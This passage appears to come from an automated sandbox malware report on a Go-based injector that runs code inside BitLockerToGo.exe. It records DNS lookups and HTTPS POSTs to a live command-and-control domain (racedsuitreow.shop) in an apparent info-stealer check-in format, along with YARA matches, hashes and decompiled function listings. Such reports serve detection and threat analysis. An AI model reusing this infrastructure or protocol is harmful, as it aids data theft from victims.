Sep 26, 2024 09:47:01.979650021 CEST	49709	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:01.979728937 CEST	443	49709	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:02.487885952 CEST	443	49709	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:02.488121033 CEST	443	49709	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:02.488245964 CEST	49709	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:02.488569975 CEST	49709	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:02.488593102 CEST	443	49709	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:02.488609076 CEST	49709	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:02.488615990 CEST	443	49709	104.21.37.97	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 09:47:00.702846050 CEST	49274	53	192.168.2.9	1.1.1.1
Sep 26, 2024 09:47:00.711632967 CEST	53	49274	1.1.1.1	192.168.2.9
Sep 26, 2024 09:47:00.715068102 CEST	54044	53	192.168.2.9	1.1.1.1
Sep 26, 2024 09:47:00.724320889 CEST	53	54044	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 09:47:00.702846050 CEST	192.168.2.9	1.1.1.1	0xa8de	Standard query (0)	pianoswimen.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:47:00.715068102 CEST	192.168.2.9	1.1.1.1	0x1a91	Standard query (0)	racedsuitreow.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 09:47:00.711632967 CEST	1.1.1.1	192.168.2.9	0xa8de	Name error (3)	pianoswimen.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:47:00.724320889 CEST	1.1.1.1	192.168.2.9	0x1a91	No error (0)	racedsuitreow.shop		104.21.37.97	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:47:00.724320889 CEST	1.1.1.1	192.168.2.9	0x1a91	No error (0)	racedsuitreow.shop		172.67.206.221	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

racedsuitreow.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49708	104.21.37.97	443	2600	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:47:01 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: racedsuitreow.shop
2024-09-26 07:47:01 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 07:47:01 UTC	551	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:47:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FFl9hwRxgk31yH1bt%2FN2s0E6MabsdhPlzEZSEzI7iCYnZ6M2ThMGoPWd%2BJsfF6Alrg34bEd0pqoGMavKJ3oVdQF157reoRxcEBk8WTALpoHSXhhjkvKGbMk85GQHUOYwyKXXm68%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91a4bd489c334e-EWR
2024-09-26 07:47:01 UTC	818	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-26 07:47:01 UTC	1369	IN	Data Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
2024-09-26 07:47:01 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 30 75 6d 52 6c 35 6f 49 4b 4d 7a 48 66 66 47 59 51 7a 48 56 47 57 53 63 75 57 41 5f 6f 77 36 62 36 68 4e 74 31 4a 61 46 4a 4f 63 2d 31 37 32 37 33 33 36 38 32 31 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 Data Ascii: <input type="hidden" name="atok" value="0umRl5oIKMzHffGYQzHVGWScuWA_ow6b6hNt1JaFJOc-1727336821-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" st
2024-09-26 07:47:01 UTC	849	IN	Data Raw: 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 Data Ascii: m:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a
2024-09-26 07:47:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49709	104.21.37.97	443	2600	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:47:01 UTC	355	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=0umRl5oIKMzHffGYQzHVGWScuWA_ow6b6hNt1JaFJOc-1727336821-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: racedsuitreow.shop
2024-09-26 07:47:01 UTC	80	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 72 75 69 33 33 33 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63 Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--rui333&j=5c9b8674a630d9101b46733aa37f15ec
2024-09-26 07:47:02 UTC	770	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:47:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cvu3v8qclegvvelgaj1jlrdl7g; expires=Mon, 20 Jan 2025 01:33:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BSCjsOIXtVoH1lYtyqWvinIA5xvaS58qivvsSgRVAo8%2FsMhseP8EKGCrp9UlRktSLUrNT6EyvOLQfx6aypGkPjdLqx7J0j596RUmILCCAVPmgc7TwVBQZDCKLHXN1WE85fGTCZM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91a4c1da572394-EWR
2024-09-26 07:47:02 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 07:47:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	03:46:15
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\iq2HxA0SLw.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\iq2HxA0SLw.exe"
Imagebase:	0x7ff6a8bf0000
File size:	19'231'232 bytes
MD5 hash:	DA6F9E46EACBDE011E7D9A6E742D05C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1859291305.000000C000716000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000000.00000000.1418035635.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000000.00000002.1863283759.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:46:59
Start date:	26/09/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Imagebase:	0xd0000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	56.6%
Total number of Nodes:	106
Total number of Limit Nodes:	14

Executed Functions

Function 0299FCBC Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 314
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0299FCCE
SysAllocString.OLEAUT32 ref: 0299FD4C
SysAllocString.OLEAUT32 ref: 0299FDFC
VariantInit.OLEAUT32(00000000), ref: 0299FE9D
SysStringLen.OLEAUT32(?), ref: 0299FF5B

Strings

0}'c, xrefs: 0299FD5E
Hi$o, xrefs: 0299FD76
=k=i, xrefs: 0299FD24
DeDk, xrefs: 0299FD6E

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: String$Alloc$BlanketInitProxyVariant
String ID: 0}'c$=k=i$DeDk$Hi$o
API String ID: 3311126758-330520821
Opcode ID: 4da85b75addf23ef2309837be93a3552f860aae23ddf3a54151ae21a7cbb55ac
Instruction ID: 5009838d45742a93a720c5921b75ea25259f31a836e3df3356b5d513015afdf6
Opcode Fuzzy Hash: 4da85b75addf23ef2309837be93a3552f860aae23ddf3a54151ae21a7cbb55ac
Instruction Fuzzy Hash: FBC18671908381DFEB108F28D495B2ABBE5FF8A355F148D1CF5958B2A1C375D944CB82

Function 02970770 Relevance: 20.5, Strings: 16, Instructions: 496
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`_l], xrefs: 02970955
A?=, xrefs: 029708FD
]kQi, xrefs: 0297098C
47, xrefs: 02970C33, 02970C3B
PG8E, xrefs: 02970913
dS`Q, xrefs: 0297094A
5C1A, xrefs: 0297091E
a7]5, xrefs: 029708E7
W/[-, xrefs: 029708D1
UwOu, xrefs: 02970997
sKuI, xrefs: 02970934
l[zY, xrefs: 02970960
FsOq, xrefs: 029709A2
hi, xrefs: 02970D07
G+), xrefs: 029708DC
Y3G1, xrefs: 029708F2

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 47$5C1A$A?=$FsOq$G+)$PG8E$UwOu$W/[-$Y3G1$]kQi$`_l]$a7]5$dS`Q$hi$l[zY$sKuI
API String ID: 0-3373099803
Opcode ID: 8b313d762ed30fb8c499c1bf4cef12b46c9bb1c6f253b47ceade09968e05c853
Instruction ID: 99d93c609c4792bab66ed9a0358f783839bb4e9d3bc72cf9a9c034201966b819
Opcode Fuzzy Hash: 8b313d762ed30fb8c499c1bf4cef12b46c9bb1c6f253b47ceade09968e05c853
Instruction Fuzzy Hash: B0122EB450C380DBD7219F24D994B6FBBF9FF86314F148D2CEA898A240E7769814CB56

Function 029A0161 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 303
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32 ref: 029A0161
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 029A019A

Strings

efg`, xrefs: 029A0304, 029A030D
efg`, xrefs: 029A0433, 029A0437
4`[b, xrefs: 029A03F0

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: FreeInformationStringVolume
String ID: 4`[b$efg`$efg`
API String ID: 983506298-1001238494
Opcode ID: 13f3d7edbb5d2bcdb6c8f9d1ba034ea932094a96e999bb884aa45972e5d74564
Instruction ID: e88e80f32b4d3c8aea149d2f46df4d5de137a76a3f9959091ea87ed4f6996026
Opcode Fuzzy Hash: 13f3d7edbb5d2bcdb6c8f9d1ba034ea932094a96e999bb884aa45972e5d74564
Instruction Fuzzy Hash: FDA1DE75A4C301EFD705DF24E861B2AB7E6FBC9715F148C2CE48997281D731A820CB92

Function 0296D1A0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInputState.USER32 ref: 0296D1B1
GetCurrentThreadId.KERNEL32 ref: 0296D1C6
GetCurrentProcessId.KERNEL32 ref: 0296D1CC
ExitProcess.KERNEL32 ref: 0296D390

Strings

"~ *, xrefs: 0296D1DA

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: CurrentProcess$ExitInputStateThread
String ID: "~ *
API String ID: 1029096631-992940167
Opcode ID: b8dbb767c950d2c2e83a75d2184f500b37771a969304dba2f1173320447f146d
Instruction ID: c5ffb7bd32b1011429e69fb483b32d8d51b7eafe3734cd443e74d0e397c8ca5a
Opcode Fuzzy Hash: b8dbb767c950d2c2e83a75d2184f500b37771a969304dba2f1173320447f146d
Instruction Fuzzy Hash: BF411774A0C3809BD301AF69D558A2EFBE6AF92709F588D0CE5D497251D33AD810CFA7

Function 0296F860 Relevance: 6.6, Strings: 5, Instructions: 383
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0umRl5oIKMzHffGYQzHVGWScuWA_ow6b6hNt1JaFJOc-1727336821-0.0.1.1-/api, xrefs: 0296FCE7, 0296FD04
vh~j, xrefs: 0296FBBD
G!aq, xrefs: 0296FBAD
}z,), xrefs: 0296FBB5
rdqn, xrefs: 0296FBF3, 0296FBFB

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0umRl5oIKMzHffGYQzHVGWScuWA_ow6b6hNt1JaFJOc-1727336821-0.0.1.1-/api$G!aq$rdqn$vh~j$}z,)
API String ID: 0-27367038
Opcode ID: 64155d54f55f175a7280e160aa0291dfb16cd604aa15fb0dc2661e29abb6bb8f
Instruction ID: 63116f0ef2e57a9da2d4daf47fd83846cfc5d9314429bdd212313a81efbfdac0
Opcode Fuzzy Hash: 64155d54f55f175a7280e160aa0291dfb16cd604aa15fb0dc2661e29abb6bb8f
Instruction Fuzzy Hash: 87D1AC7050C3818BC311DF28E49462EBBE6AF96748F580D5CE4D68B362D336D949CBA7

Function 029A7130 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(029AA8AD,005C003F,00000006,?,?,00000018,;:54,?,?), ref: 029A715E

Strings

;:54, xrefs: 029A7130, 029A714C, 029A715A

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: ;:54
API String ID: 2994545307-2887251705
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 0299FAD0 Relevance: 1.6, APIs: 1, Instructions: 66
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(029AECE0,00000000,00000001,029AECD0,00000000), ref: 0299FBFE

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: e71c766b730620d1312c5ed655dc3ef9b6c45f1c30a34bd5af48799e0175a00b
Instruction ID: a1bc4a984bb5007a7fc65c3839fc4bc715867510d8758a42a3b074a5d2a01129
Opcode Fuzzy Hash: e71c766b730620d1312c5ed655dc3ef9b6c45f1c30a34bd5af48799e0175a00b
Instruction Fuzzy Hash: 142126B045C384ABE3708F15C855B9BBBE8FB86719F40490CF5C89A281CBB19508CBA3

Function 02972773 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 846
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 02972BBC
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 02972BD6
CoUninitialize.OLE32 ref: 02972FFB

Strings

G1}q, xrefs: 0297283D
FB7686265FD290D4D6F0733735DE7FE6, xrefs: 02972773
T1S7, xrefs: 02972A40
xr, xrefs: 029729A6
$#, xrefs: 02973413
"PWV, xrefs: 0297281C
_./^, xrefs: 02972827
., xrefs: 02973010
"TW^, xrefs: 02972811
racedsuitreow.shop, xrefs: 02972B75, 02973485

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: DirectorySystem$Uninitialize
String ID: "PWV$"TW^$$#$.$FB7686265FD290D4D6F0733735DE7FE6$G1}q$T1S7$_./^$racedsuitreow.shop$xr
API String ID: 1329415092-255722275
Opcode ID: 3087f2a22d49a7ee739dd95a3e031ea11603e7b58c8137848ad3ec5c57de2ee7
Instruction ID: 67e12d7cfe2cefec47582f59b81521a50315af7b1b0d79ba7f8d859c0753609c
Opcode Fuzzy Hash: 3087f2a22d49a7ee739dd95a3e031ea11603e7b58c8137848ad3ec5c57de2ee7
Instruction Fuzzy Hash: 29624AB050A3C0DAE7319F149854BEFBBE5BF9A308F08095DE4C95B242D7369505CBA7

Function 029A3E10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 029A3E73

Strings

EZ[X, xrefs: 029A3E10

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID: EZ[X
API String ID: 1279760036-3495592236
Opcode ID: 602287bca5418f22144395a9b02488c6a0fb21a429706db14a81590023af5f30
Instruction ID: f86a51f9ef0f78545516099b68c3cb5a65c69b49155e9fec3c2cd0427898a840
Opcode Fuzzy Hash: 602287bca5418f22144395a9b02488c6a0fb21a429706db14a81590023af5f30
Instruction Fuzzy Hash: F0F01D7050D2409BD301AB18E954A0EFBF5EF96A04F548C6CE4C497261C336E864CBA7

Function 029A6058 Relevance: 1.6, APIs: 1, Instructions: 52
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(C944CB51,00000000,00000800), ref: 029A60E2

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: bd823f1e9f2ec0e6d29c87f408f610a9dd3fd7ae89866788c1ba6cc57e784684
Instruction ID: 41ba625a65f5adf5f992191455909e1d2ecc2bed0b8aa8db9bace1794287ceea
Opcode Fuzzy Hash: bd823f1e9f2ec0e6d29c87f408f610a9dd3fd7ae89866788c1ba6cc57e784684
Instruction Fuzzy Hash: 6F01A57A11C3809FD702EF29D864A1EBBE9AB95344F688D1CE0C4C7251C334AA518F97

Function 0299FC10 Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 0299FC8C

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 6279315937694d69f3c4ae87e708e6d382164fd3eba8b9b7089e8c0744291cf7
Instruction ID: a1eedfa3c01686e6b0ad0043a89848e39be55e45558fe310aab33645b94ddb68
Opcode Fuzzy Hash: 6279315937694d69f3c4ae87e708e6d382164fd3eba8b9b7089e8c0744291cf7
Instruction Fuzzy Hash: 9C0102B4009385ABE300CB25D584A1FBFE5BB9A359F44990CF8C89A662C774D441CF96

Function 029A3EA8 Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 029A3EFF

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 95fc0d2ba5595f5bcaab145b3455858d58b2a39f55d00f15fa815784b6c2ed26
Instruction ID: 59985a53fd65f163d170b0458989d00a8f8e9e4c92447282b4714488b1e42648
Opcode Fuzzy Hash: 95fc0d2ba5595f5bcaab145b3455858d58b2a39f55d00f15fa815784b6c2ed26
Instruction Fuzzy Hash: 21018C35E44244EBCB028F88D455AADFB75EF06311F154592E824A7241C334AA20CB94

Function 02972751 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02972763

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: be655998266b22090a6b727c84a6d13227c5f661ffb1a949811b11210538f0af
Instruction ID: 419ba5e71ceceb06bdb4e6b708f30ae1db274a4f7add1deecde85db4344c4fdb
Opcode Fuzzy Hash: be655998266b22090a6b727c84a6d13227c5f661ffb1a949811b11210538f0af
Instruction Fuzzy Hash: D3D092307CC304B6F9710A0CAD1BF643110AB02F32F300700F3667C4C499E23120861D

Function 02972730 Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 02972741

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

